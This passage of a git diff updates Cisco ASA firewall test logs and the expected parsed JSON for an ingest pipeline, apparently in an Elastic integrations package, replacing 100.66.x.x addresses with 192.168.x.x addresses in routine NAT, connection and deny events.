%ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json index 6a71157f134..d89b51ee8f0 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111550576Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:31:36.363216200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111556081Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:31:36.363224400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111559421Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363228700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111561357Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363232700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111563080Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363237300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111564689Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363241900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" @@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111566358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363246800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111567977Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363252300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" @@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111569614Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363256500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111571296Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363260700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111572966Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363265400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111574850Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363269900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111576497Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363274400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111578094Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363279300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" @@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111579805Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363283900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111581438Z", - "original": "Oct 10 2018 12:34:56 